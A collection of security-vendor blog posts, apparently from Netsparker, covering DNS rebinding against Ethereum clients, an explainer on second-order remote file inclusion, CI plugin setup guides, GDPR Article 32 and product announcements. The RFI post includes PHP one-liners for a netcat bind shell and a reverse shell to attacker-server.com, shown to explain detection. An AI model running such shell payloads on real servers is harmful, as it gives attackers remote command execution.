        • Since the JavaScript code is still running under the origin of attacker.com, which is now pointing to 127.0.0.1, Jazzy can easily read the responses

        The reason why he uses a random subdomain for each attack is simple. DNS queries are often routed through different servers. This means that the IP the DNS server sees isn't necessarily the IP of the user. It's possible that multiple users visit the site, but their DNS requests come from the same IP. Therefore using the IP address isn't a reliable way to tell two users apart. A subsequent victim that visits attacker.com would instantly see an empty JSON-RPC response instead of the page containing the malicious JavaScript code, which is why using different subdomains for each user is the safest way to get it right.

In his blog post How your ethereum can be stolen through DNS rebinding, Jazzy explains that he was able to read Ethereum addresses and balances, and could possibly have stolen Ethereum if the wallet wasn't locked. Even though this sounds like a serious vulnerability that needs to be fixed, the Ethereum Foundation doesn't acknowledge it. It's hard to say how long it will take until someone actively exploits this vulnerability in the wild, but considering the fact that many attackers seem eager to make a quick buck by robbing Bitcoin exchanges and stealing cryptocurrency tokens, our guess is that attackers will act soon, especially since Geth and the C++ and Python clients seem to be vulnerable.

        How to Install and Configure the Netsparker Cloud Scan Jenkins Plugin


        Jenkins is an automation server that enables software developers to build automation into their projects by supplying plugins. Jenkins functionality can be extended by using our new Netsparker Cloud Scan Jenkins plugin.


        This article explains how to install and configure the new Netsparker Cloud Scan Jenkins Plugin to enable our advanced integration functionality so that you can launch automated scans and view reports of vulnerabilities in Jenkins.

        Downloading and Installing the Netsparker Cloud Scan Jenkins Plugin

        The plugin is packaged into an hpi file called netsparker-cloud-scan.hpi. This package has been tested and approved for Jenkins version 2.33+.

        To Download and Install the Netsparker Cloud Scan Jenkins Plugin
1. In Netsparker Cloud, navigate to the New Integrations window, and from the Continuous Integration Systems panel, select Jenkins. The Jenkins Plugin Installation and Usage window is displayed.
2. Click Download the plugin, and save the file to a location of your choice.
3. Open Jenkins.
4. From the main menu, click Manage Jenkins. The Manage Jenkins window is displayed.
5. Click Manage Plugins. The Plugin Manager window is displayed.
6. Click the Advanced tab.
7. From the Upload Plugin section, click Choose File. The Open dialog box is displayed.
8. Select the netsparker-cloud-scan.hpi file you downloaded previously, and click Open. The file is uploaded, and the focus of the window returns to the Advanced tab.
9. In order to use the plugin, restart Jenkins. To restart, from a browser, navigate to:
• [jenkins_url]/safeRestart (restarts Jenkins after the current builds have completed)
• [jenkins_url]/restart (forces a restart; builds will not wait to complete)

        Configuring The Jenkins Project

        Each Jenkins project has its own build configuration. Each build configuration has its own build steps. The Netsparker Cloud Scan must be added to a Jenkins project as a build step.

        How to Configure the Jenkins Project
1. Open Jenkins. From the main menu, click Manage Jenkins. The Manage Jenkins window is displayed.
2. Click Configure System. The Configure System window is displayed.
3. In the Netsparker Cloud section, enter your Netsparker Cloud Server URL and API Token, and click Test Connection to verify access to Netsparker Cloud. Then, click Save.
4. Navigate to the Jenkins Home page and click the project to which you want to add the Netsparker Cloud Scan build step. The Project window is displayed.
5. From the menu, click Configure. The Configure window is displayed.
6. Click the Build Environment tab.
7. From the Build section, click the Add build step dropdown, and select Netsparker Cloud Scan. The Scan Settings panel is displayed.
8. Select the relevant options from Scan Type, Website Deploy URL and Profile Name.
9. Click Save.

        Viewing Netsparker Scan Results in Jenkins

        When the build has been triggered, you can view the scan results in the Netsparker Cloud Report window.

        How to View Netsparker Cloud Reports in Jenkins
1. Open Jenkins.
2. From your project page, select a build from the Build History section. The Build Detail window is displayed.
3. From the menu, click Netsparker Cloud Report. The scan may take a while; if it is not yet finished, a warning message is displayed.
4. When the scan has been completed, the scan results, the Netsparker Cloud Executive Summary Report, are displayed.
5. For further integration with Netsparker Cloud, you can also ensure that your SCM plugin is configured to share changelog data. From your Project window, click the Source Code Management tab, and from the Additional Behaviours dropdown, select the committer's name.

        Second-Order Remote File Inclusion (RFI) Vulnerability Introduction & Example


        The main difference between a Remote File Inclusion (RFI) vulnerability and a second-order one is that in a second-order RFI, attackers do not receive an instant response from the web server, so it is more difficult to detect. This is because the payload that the attacker uses to exploit the vulnerability is stored and executed at a later stage.

        Exploiting a Second-Order Remote File Inclusion Vulnerability

        Imagine a website that allows users to submit links through a web form. These submissions are later reviewed by a moderator, on a control panel that directly adds the remote content into the page. If an attacker manages to use the form to submit a remote website containing a dangerous payload, this payload will be executed once the moderator opens the page.

This means that the attacker's included file will still be executed on the web server. However, the attacker cannot use a guided web shell with a user interface to issue commands, since the admin is the only one who would see the output. So they have to resort to alternative techniques, such as spawning a bind or reverse shell.

        A bind shell listens on a specific web server port and binds a shell (such as Bash) to it. Once the attacker connects, they are able to execute commands. This will not work, however, if a firewall is in place that prevents non-whitelisted ports from receiving incoming connections.

<?php
// Bind shell: listen on port 4444 and attach a shell to incoming connections.
system('nc -lp 4444 -e /bin/bash');

        A reverse shell does the same, but instead of listening on the web server, it actively initiates a connection to the attacker’s machine. This bypasses the firewall rule, since this connection is outgoing, not incoming.

<?php
// Reverse shell: connect out to the attacker's machine and attach a shell,
// bypassing firewall rules that only filter incoming connections.
system('nc attacker-server.com 4444 -e /bin/bash');

        Another method, which is often used in automated exploitation by malicious hackers, is hard-coding the command that installs malware on the server into the included file, without further possibility of interaction. The malware in this case is often a piece of code that connects back to a command and control server, awaiting further instructions.

        How Does Netsparker Detect Second-Order RFI Attacks?

This screenshot shows the RFI vulnerability as reported in Netsparker Desktop.

        As with other second-order and blind web application vulnerabilities, the Netsparker web application security solution probes the web application and sends a payload with a custom hash. That hash is used as a subdomain of our Netsparker Hawk testing infrastructure, which results in a URL like this:

        b92e8649b6cf4886241a3e0825bd36a262b24933.r87.me

        When the file inclusion is triggered at a later time, the vulnerability is exploited as follows:

        1. The web server tries to include a file under b92e8649b6cf4886241a3e0825bd36a262b24933.r87.me
        2. The Netsparker Hawk server responds with another payload containing code, which forces the web server to resolve yet another custom subdomain

        If the second DNS query is successful, Netsparker will confirm the blind RFI.

        Netsparker Will Be Exhibiting at the RSA Conference 2018 in San Francisco



        This year Netsparker will be exhibiting at the RSA Conference in San Francisco, USA. The event will be held from April 16-20 at the Moscone Center.

        Join Us at Booth #3105 in the North Expo at RSA Conference 2018

        Members of our team will be representing Netsparker at booth #3105 in the North Expo. Our team will be available to answer any questions you might have about automatically detecting vulnerabilities in your website and web applications.

        Visit the RSA Conference website for a copy of the agenda and more information about the sessions and events.

        We look forward to meeting you there!

        Register for a Free Exhibit Hall Only Pass at RSA Conference 2018

        Use the Expo Pass Code X8ENETSP to register for a complimentary Exhibit Hall Only Pass.

        GDPR Article 32: Security of Data Processing


The EU General Data Protection Regulation (GDPR) is a regulation formulated by the European Union to strengthen and unify data protection for all individuals within the EU. It covers many subjects, such as Privacy by Design and Data Breaches. One section in particular that applies to all those working in Information Security is Article 32.

        What is GDPR Article 32?

        Article 32 lays out a few legally binding requirements for handling customer data in a secure manner, many of which have long been considered best practice. This article is designed to help businesses keep personal data secure by requiring them to adhere to its terms. It also aims to provide practical guidelines for businesses that want to improve their security procedures. In this blog post, we break down some of the most important aspects of Article 32.


        Using the Latest Available Tools and Software

        According to Article 32 of the GDPR regulations, only the most recent technology will suffice when implementing appropriate technical and organizational measures. What this means is that you are required to use the newest tools and methods in order to secure customer data. Depending on the context, this can range from modern, up-to-date security tools, like web vulnerability scanners and tools for logging and monitoring, to regular staff training and strong password policies.

Database servers, web servers and any other type of server software used in the organization have to be up to date and regularly patched in order to adhere to this part of the GDPR.

        Handling and Processing Personal Data

The nature, scope and purpose of the data processing an organization performs also need to be documented. Data must also be stored appropriately. For example, credit card data has to be handled one way, whereas email addresses are handled a different way. Generally, the rule is that it's best to store the minimum amount of data needed to perform a specified task.

        Segregating Data

        As an application of the above rule, organizations have to make sure they adjust their security measures to match the probability and severity of a breach against the potential impacts on rights and freedoms of data subjects.

This means that a breach of a website that allows the exchange of sensitive data between journalists and sources may have a higher impact on the rights and freedoms of the affected users than the breach of a site that allows people to share cooking recipes, for example. It's vital to separate and estimate these varying risks, and then apply security measures appropriate to each.

        Minimum Compliance Requirements in Article 32

Article 32 of the GDPR states that, at a minimum, the measures it requires should include the following:

• Personal data should be pseudonymised (for example, by replacing names with unique identifiers, as in the sketch after this list) and encrypted where possible.
        • Ongoing confidentiality, integrity, availability and resilience of processing systems and services must be ensured. In other words, all data should be readily available to users, and provisions should be made to ensure that it is not read or tampered with by unauthorized persons, whether accidentally or on purpose.
        • In case of a detrimental physical or technical incident, access to personal data must be able to be restored quickly. This refers to offsite backups and emergency strategies in case of unforeseen events.
        • Organizations must implement a process for regularly testing, assessing and evaluating the effectiveness of technical and organizational measures that are designed to ensure the security of processing. In other words, organizations shouldn't blindly rely on established security measures, but proactively test them in order to see whether or not they work as intended. In the case of web applications, this would include penetration testing and regular application vulnerability scanning.
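As a minimal sketch of pseudonymisation in PHP, assuming a keyed hash is an acceptable approach for your data (the key source and the email address are hypothetical), the real identifier is replaced with an HMAC so that records can still be linked without storing the identifier itself:

<?php
// The secret key must be stored separately from the pseudonymised data.
$secretKey = getenv('PSEUDONYM_KEY'); // hypothetical key source
$pseudonym = hash_hmac('sha256', 'alice@example.com', $secretKey);
echo $pseudonym; // a stable identifier that reveals nothing about the address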

        Consider All the Risks of Processing Data

        Article 32 further states that organizations must consider the risks that are presented by processing personal data. These risks might take the form of accidental or unlawful destruction, loss, alteration, or unauthorised disclosure of personal data. It also includes how personal data is accessed, transmitted and stored. This GDPR section closes by reiterating that only authorized persons should process data when they are required or instructed to do so.

        In summary, organizations should make sure that all personal data is safely stored and only transmitted to trusted, authorized persons and third parties.

        The Road to GDPR Compliance

Implementing the varying aspects of the GDPR remains a challenge for many organizations. To help you get started, we have written a white paper, The Road to GDPR Compliance – a high-level overview of what organizations should do in order to become GDPR compliant.

        Complying with Article 32 of the GDPR

One way in which the technical security measures referred to in the GDPR can be implemented is by establishing a procedure for regular scans with a web application vulnerability scanner. Get in touch with us to learn how Netsparker can help your organization comply with Article 32 of the GDPR.

        How to Install and Configure the Netsparker Cloud Scan TeamCity Plugin


This article explains how to use the new Netsparker Cloud TeamCity plugin to integrate Netsparker Cloud with TeamCity, and to enable our advanced functionality.

        Downloading and Installing Netsparker Cloud Scan's TeamCity Plugin

        The Netsparker Cloud Scan TeamCity plugin is packaged into a zip file called netsparkercloud-teamcity-plugin.zip. This package has been tested and approved for TeamCity version 9+.

        To Download and Install the Netsparker Cloud Scan TeamCity Plugin
1. Open Netsparker Cloud. From the menu, select Integrations, then New Integrations.
2. From the Continuous Integration Systems panel, select TeamCity. The TeamCity Plugin Installation and Usage window is displayed.
3. Click Download the plugin, and save the file to a location of your choice.
4. Open TeamCity.
5. From the Admin window, click Global Settings. The Global Settings window is displayed.
6. From the TeamCity Configuration section, next to the Data Directory field, click Browse.
7. Select the netsparkercloud-teamcity-plugin.zip file you downloaded previously, and upload it into the plugins directory.
8. Finally, restart TeamCity. When TeamCity's services start, it will look for plugin packages in the plugins directory and automatically load them.

        Configuring the TeamCity Project

        Each TeamCity project has its own build configuration. Each build configuration has its own build steps. The Netsparker Cloud Scan must be added to a TeamCity project as a build step.

        How to Configure the TeamCity Project
1. Open TeamCity. In the Admin window, from the Integration section of the main menu, click Netsparker Cloud. The Global Netsparker Cloud API Settings window is displayed.
2. In the API Settings section, enter the API credentials: Netsparker Cloud Server URL and API Token.
3. Click Test Connection.
4. Click Save.
5. From the main menu, click Projects. The Projects window is displayed.
6. From the Projects window, select the build configuration to which you want to add the Netsparker Cloud Scan plugin. The Build Configuration window is displayed.
7. Click Edit Configuration Settings. The Build Configuration Settings window is displayed.
8. Click Build Steps, then Add build step. The New Build Step window is displayed.
9. From the Runner type dropdown, select Netsparker Cloud Scan. Further fields are displayed.
10. In the Scan Settings section, select the relevant Scan Settings (Endpoint parameters).
11. Finally, click Save.

        Viewing Netsparker Scan Results in TeamCity

When the build has been triggered, you can view the scan results in the Netsparker Scan Result tab on the build results page.

        How to View Netsparker Scan Results in TeamCity
1. Open TeamCity. On your Projects window, click the Netsparker Cloud Report tab. If the scan is not yet finished, a warning message is displayed.
2. When the scan has been completed, the scan results, the Netsparker Cloud Executive Summary Report, are displayed.


        How to Integrate Netsparker Into Your Existing SDLC


        What is the Software Development Lifecycle?

        The software industry has refined the Software Development Life Cycle process over many years. It is the process that software developers use to design, develop and test resilient, quality software that meets the requirements of potential customers or specific commissioning clients. It must also meet stated budgets and deadlines.

        Normally, software development passes through these key stages, beginning with Planning.

        1. The Planning stage begins with gathering requirements from potential purchasers, industry experts and existing research, and the organisation's own sales team. Collated information helps determine whether a project is financially and technically viable.
        2. The Defining stage involves getting clarity on the product requirements and documenting them, often by way of a Software Requirement Specification (SRS), which is then approved by the customer or by the Business Analysts in the organisation.
        3. The Designing stage is based on the SRS, which product architects use to construct a Design Document Specification (DDS) that may include various potential design approaches, including architecture, data flow and 3rd party integrations.
        4. The Building stage is when development begins. Developers follow the DDS and generate code according to their organization's coding guidelines document.
        5. The Testing stage can happen during all other previous stages and includes reporting of defects, which are fixed until the product reaches the required standard.
        6. The Deployment stage is when the product is released into the relevant market, or directly to the customer. Sometimes, this can be divided into further stages, released in a limited way first and tested, then released again following further fixes.

        How Does Netsparker Integrate with Your Existing SDLC?

        We developed the TeamCity and Jenkins plugins to help you complete the Netsparker Cloud-assisted SDLC. Using our plugins, users with Administration permissions can now initiate test scans, which are run using the Netsparker Cloud API in the continuous integration build.

For further information on installing and configuring the plugins, see the Jenkins and TeamCity installation articles above.

        Continuous Integration Information

Normally, integrating the Netsparker Cloud plugins into your environment is sufficient to establish a Netsparker Cloud-assisted SDLC. However, in some cases additional configuration is necessary to take advantage of all the benefits (see Configuring User Mappings).

Continuous Integration (CI) is standard practice in the SDLC: developers working in a team commit their code changes to a shared repository, which means many integrations each day. Finding the inevitable errors rapidly is key to avoiding knock-on breakage and keeping the SDLC moving quickly, so each integration is automatically verified by a build that includes tests.

When a scan is initiated from the continuous integration (CI) build via Netsparker Cloud's new TeamCity and Jenkins plugins, you can access the CI build details as described in the following sections.

        Viewing Continuous Integration Information in Netsparker's Status Window

        You can access CI information from Netsparker Cloud scan's Status window.

        How To View CI Build Information in the Status Window
1. Log in to Netsparker Cloud. From the Scans menu, click Recent Scans. The Recent Scans window is displayed. (If scans have been initiated by the CI server, the Website column displays a CI server icon.)
2. For the relevant ongoing or queued scan, click Status. The Status window is displayed. In the Executive Summary panel, the Status field shows a green bar that displays the scan's current status.
3. In the Continuous Integration Details section, you can view build information.
4. In the Build ID field, click the Build ID link. In TeamCity, the continuous integration server opens at the Build Log; in Jenkins, the Console Output window opens.
5. In the Commit/Changeset field, click the Commit/Changeset link. In TeamCity, the continuous integration server opens at the Changes tab; in Jenkins, at the Changes window.
6. Click the Netsparker Scan Result to view the scan result. In both TeamCity and Jenkins, the Netsparker Cloud Executive Summary Report is displayed.

        Accessing Continuous Integration Details in the Scan Report

        You can access CI details in the scan's Report window.

        How to View Continuous Integration Details in the Scan Report
        1. Log in to Netsparker Cloud. From the Scans menu, click Recent Scans. The Recent Scans window is displayed.
        2. For the relevant completed scan, click Report. The Report window is displayed.
        3. From the Scan Summary tab, in the Continuous Integration Details section, you can view build information.
        4. In the Build ID field, click the Build ID. The TeamCity application opens at the Build Log tab.
        5. Click Commit/Changeset. The TeamCity application opens at the Changes tab.
        6. Click the Netsparker Scan Result tab to view the scan result. If the scan is queued or ongoing, the following message is displayed: 'The scan report is not available yet because the scan is not finished. Please try again later.'

        Viewing Continuous Integration Details in the Issues Window

        You can access CI information from Netsparker Cloud's Issues window.

        How to View CI Build Information in the Issues Window
        1. Log in to Netsparker Cloud. From the Issues menu, click All Issues. The Issues window is displayed.
        2. Click the Title of the relevant issue. The Issue window is displayed.

        Configuring User Mappings

        If your username in TeamCity or Jenkins is not the same as your Netsparker username, you can use our User Mappings functionality to match them. You can add as many user mappings as you want. Users with Administrator permissions can manage all other members' username configurations.

        User Mappings must be unique. If you attempt to add a user mapping with the same Integration System and Integration User as an existing mapping, an error message is displayed.

        You can add, edit or delete User Mappings.

        How To Configure a New User Mapping
        1. Log in to Netsparker Cloud. From the Integrations menu, click User Mappings. The User Mappings window is displayed.
        2. Click New User Mapping. The User Mapping window is displayed.
        3. From the Integration System field, select the relevant system.
        4. In the Integration User field, enter the relevant username used in TeamCity or Jenkins.
        5. From the Netsparker Cloud User dropdown, select the relevant username.
        6. Click Save.

        Disabling the Assigning of Issues in Netsparker to the Code Committer 

        By default, if scans are configured to be triggered by a version control system change (such as a git commit), Netsparker Cloud will assign the detected Issues to the committer.  

        Disabling this behaviour means that Netsparker Cloud will assign the detected Issues to the website's Technical Contact regardless of whether Netsparker Cloud is able to identify the committer.
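        The rule boils down to a simple fallback, shown in the minimal Python sketch below. The function and parameter names are hypothetical illustrations of the behaviour described above, not part of the product's API.

            from typing import Optional

            def choose_assignee(committer: Optional[str],
                                technical_contact: str,
                                assign_to_committer: bool) -> str:
                """Return who a newly detected Issue should be assigned to."""
                # Default behaviour: assign to the committer when the scan was
                # triggered by a VCS change and the committer was identified.
                if assign_to_committer and committer is not None:
                    return committer
                # Option disabled, or committer unknown: fall back to the
                # website's Technical Contact.
                return technical_contact

            # Example: with the option disabled, the committer is ignored.
            print(choose_assignee("alice", "tech-contact@example.com", False))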

        To disable this default behaviour, ask your Netsparker Cloud account Administrator to follow the steps below.

        How to Disable the Assigning of Issues in Netsparker to the Code Committer
        1. Log in to Netsparker Cloud. From the Your Account menu, click Account Settings. The Change Account Settings window is displayed.
        2. In the Account-wide Options section, check the Disable assigning issues to the committer option.
        3. Click Update.

        February 2018 Netsparker Cloud Update


        We are happy to announce the first Netsparker Cloud update of 2018! The major highlights of this update are the integration plugins. Netsparker Cloud is the only web application security solution on the market that enables businesses to scan thousands of websites within just hours and generate accurate results they can act on without any manual verification process.

        Netsparker Cloud’s unique ability to scale makes it a perfect solution for businesses and enterprises that have a lot of websites they are struggling to secure. This is why, in this and future updates, we will focus much more on developing integration tools that make it easy to build automated web vulnerability scanning into the SDLC.

        Integration Plugins for TeamCity and Jenkins

        With this release we are announcing two new integration plugins: one for TeamCity and one for Jenkins.

        Both integrations are very easy to set up because they are wizard driven, though should you need assistance, refer to the respective plugin documentation for a detailed walk-through of how to set up each integration.

        Integration Menu in Netsparker Cloud

        We have also introduced a new Integration menu in Netsparker Cloud, from which you can view all available integration plugins and set up your own integrations.

        Improved API Documentation

        Netsparker Cloud also has a fully fledged REST API that can be used to integrate the web security solution with virtually any tool you typically find in the SDLC, DevOps and live environments. In this update, we have also upgraded the REST API documentation by including more examples.
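        As a taste of the API's general shape, the short Python sketch below lists recent scans. The endpoint path, authentication scheme and response envelope are assumptions for illustration; the upgraded API documentation provides the authoritative request and response formats.

            import os

            import requests  # third-party library: pip install requests

            API_BASE = "https://www.netsparkercloud.com/api/1.0"  # assumed base URL

            def list_recent_scans(page: int = 1) -> list:
                """Fetch one page of recent scans from the REST API."""
                response = requests.get(
                    f"{API_BASE}/scans/list",  # assumed endpoint path
                    params={"page": page},
                    auth=(os.environ["NETSPARKER_USER_ID"],   # assumed basic auth
                          os.environ["NETSPARKER_API_TOKEN"]),
                    timeout=30,
                )
                response.raise_for_status()
                return response.json().get("List", [])  # assumed response envelope

            for scan in list_recent_scans():
                print(scan)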

        For a complete list of what is new, improved and fixed in this update, refer to the Netsparker Cloud changelog.

        Netsparker and Brinqa to Partner on Web Application Security Webinar


        This month, Netsparker will partner with Brinqa to deliver a webinar on how businesses and organizations can secure their most exposed attack surface – web applications.

        Web Application Attacks Are the Main Cause of Data Breaches

        According to the Verizon 2017 Data Breach Investigations Report, web application hacking is the primary cause of data breaches (62%), and 81% of hacking-related breaches leveraged stolen or weak passwords. Most of these attacks are perpetrated by outsiders who are financially motivated and have little compunction about whether their target is a financial organization, a healthcare body, a public sector entity or an online retail store. And the targets of these increasingly sophisticated attackers aren't always the big players – 61% of data breach victims are businesses with under 1,000 employees.

        How to Secure Your Most Exposed Attack Surface

        Netsparker and Brinqa are technology companies leading the way in web application vulnerability detection, management and remediation. Netsparker is an automated, dead accurate, scalable and easy-to-use, enterprise-level web application security scanner that enables businesses to find security flaws in their websites, web applications and APIs. Brinqa is a cyber risk management platform that helps cybersecurity professionals triage and remediate threats and vulnerabilities in the context of both business impact and weaponization likelihood.

        Join Our Webinar on March 15, 2018


        This upcoming webinar will discuss how these two security tools can integrate with each other to create a robust web application security plan that helps AppSec programs identify, prioritize, remediate and report the most critical security flaws.

        Our speakers are Ferruh Mavituna (CEO, Netsparker) and Syed Abdur (Director of Product, Brinqa). Ferruh's background of hands-on experience and deep understanding of both the attacking and defending sides of web application security was the impetus for Netsparker's accelerated growth. Netsparker has created technologies that have transformed the automated web application security industry and is a trusted security partner for thousands of companies around the world.

        Syed's experience includes technical software development and delivering large enterprise security applications at Sun Microsystems and Oracle. He is responsible for driving the overall strategy and technical direction of Brinqa's product lines.


        Webinar Details

        The webinar starts at 10:00 am PST, 12:00 pm CST, 1:00 pm EST. It is free of charge and will last for 1 hour. There will be an opportunity to ask questions and engage with our speakers.

        Please click here to register for the webinar.

        We look forward to meeting you!

        Enterprise Security Weekly #81


        Ferruh Mavituna, Founder and CEO of Netsparker, was interviewed by Paul Asadoorian and Dr Doug White during the Enterprise Security Weekly podcast show #81. During the interview, Ferruh talked about:

        • The current focus for Netsparker - scanning at scale. Netsparker Cloud is helping enterprises with thousands of web applications to find vulnerabilities automatically and then begin to take remediation action without delay. Large organizations still suffer data breaches and web application vulnerabilities remain the most common source.
        • He then highlighted the need for product honesty in the web application security industry, as the problem of false positives and poor accuracy can lead to a loss of trust among organization leaders. Scanners that, unlike Netsparker, don't tackle the problem of false positives can discredit the process and create friction between technology teams and management.
        • There was a discussion about the relationship between dynamic analysis tools like Netsparker and static analysis ones. Ferruh's view was that integrating these tools helps pinpoint vulnerabilities, and he suggested the possible use of dynamic tools to validate the findings of the static ones.
        • On the question of performance, he emphasised that once a company moves from Netsparker Desktop to Netsparker Cloud, scalability is no longer an issue, since hundreds or even thousands of websites can be scanned at once. Inaccurate scanners that generate large numbers of false positives and false alarms are an impediment to working at scale in any organization, especially one with multiple security problems and priorities to weigh up. What is vital for such organisations is end-to-end vulnerability management: detection, proof of exploit, details including threat levels, and remediation advice.
        • It turns out that the biggest challenge with IoT devices is that their code is often written by non-web developers, who therefore don't use the typical queries, languages or servers, or observe the expected coding standards. However, Netsparker could still find and validate many of their vulnerabilities.
        • Ferruh confirmed that Netsparker will be exhibiting at the RSA Conference 2018 in San Francisco. He extended an invitation to any businesses interested in web application security challenges, including scalability, to come and talk to him there.

        Securing Netsparker Cloud by Restricting IP Addresses


        IP Address Restrictions is a feature that allows organizations to restrict the IP addresses from which users can access the Netsparker Cloud dashboard, enhancing the security of the solution. This feature is also included in the on-premises edition of the solution. Once it is enabled, anyone trying to log in to Netsparker Cloud from an IP address not in the Trusted IP Addresses list will be denied access.

        This IP Address restriction feature is disabled by default. This document explains how to enable and configure IP Address Restrictions.

        IP Restrictions Configuration

        Only account administrators can enable or disable IP restrictions in Netsparker Cloud.

        How To Enable IP Restrictions
        1. From the Your Account menu, select IP Restrictions. The IP Address Restrictions window is displayed.
        2. Check the Enable IP Restrictions checkbox.

        Note that only one IP address can be added at a time; ranges and wildcards are not supported.

        3. Click New. A new row is displayed. Your IP address is shown in the sidebar; we highly recommend adding it first, to avoid locking yourself out.
        4. In the Description field, enter a description for your restriction, such as Home IP Address or Office IP Address.
        5. In the IP Address field, enter the full IP address.
        6. Click Save.
        7. If your IP address is not listed in the table, a warning dialog is displayed.

        How To Delete a Trusted IP Address
        1. From the Your Account menu, select IP Restrictions.
        2. Next to the relevant IP Address, click x.

        What Happens When Users Try to Log In from a Non-Trusted IP Address?

        When a user tries to log in from an unlisted IP address, they are redirected to the SIGN IN window, which displays an error message: 'Your IP address is not allowed (Current IP Address: #address). Please contact your Account Administrator #admin-name (#admin-email)'.
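        Conceptually, the check behind this feature is a simple exact-match lookup against the trusted list, as the Python sketch below illustrates. This is an illustration of the rule (exact match only, no ranges or wildcards), not Netsparker Cloud's actual implementation.

            # Example trusted list; in the product this is configured per account.
            TRUSTED_IPS = {"203.0.113.10", "198.51.100.25"}

            def is_login_allowed(client_ip: str, restrictions_enabled: bool) -> bool:
                """Apply the IP restriction rule to a login attempt."""
                if not restrictions_enabled:     # the feature is disabled by default
                    return True
                return client_ip in TRUSTED_IPS  # exact match only

            print(is_login_allowed("203.0.113.10", True))   # True: listed address
            print(is_login_allowed("203.0.113.99", True))   # False: redirected to SIGN IN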

